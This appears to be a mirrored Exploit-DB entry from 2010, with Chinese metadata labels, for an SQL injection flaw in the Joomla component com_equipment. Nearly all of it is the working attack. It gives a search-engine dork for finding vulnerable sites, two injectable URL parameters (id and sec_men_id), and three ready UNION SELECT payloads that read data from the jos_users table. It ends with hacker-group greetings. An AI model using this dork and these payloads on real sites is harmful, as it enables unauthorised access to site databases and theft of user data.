Joomla! Component com_equipment – SQL Injection

  • 作者: Forza-Dz
    日期: 2010-08-16
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/14655/
  • # Exploit Title : Joomla "com_equipment" Sql Injection Vulnerability
    # Date : 16 - 8 - 2010
    # Author : Forza-Dz 
    # Vendor : http://joomlaequipment.com/ 
    # Version : All Versions
    # Tested on : Win Sp2 and Mac 
    ############################################################ 
    Dork = inurl:"com_equipment" 
    ############################################################ 
    --- SQL Injection Vulenrability ---
    SQL Injection Vulenrability component "com_equipment" 
    ############################################################
    ===[ Exploit ]=== 
    http://www.site.com/path/index.php?option=com_equipment&view=details&id=[SQL] 
    or
    http://www.site.com/path/index.php?option=com_equipment&task=components&id=45&sec_men_id=[SQL] 
    ############################################################ 
    ===[Injection]=== 
    [SQL] = +Union+select+1,user(),3,4,5,6+from+jos_users--
    [SQL] = +Union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17+jos_users-- 
    [SQL] = +Union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
    ############################################################ 
    Greetz @ MCA-CRB All "DZ" "MusliM"
    ############################################################ 
    ======[saha fotorkom]====== 
    ############################################################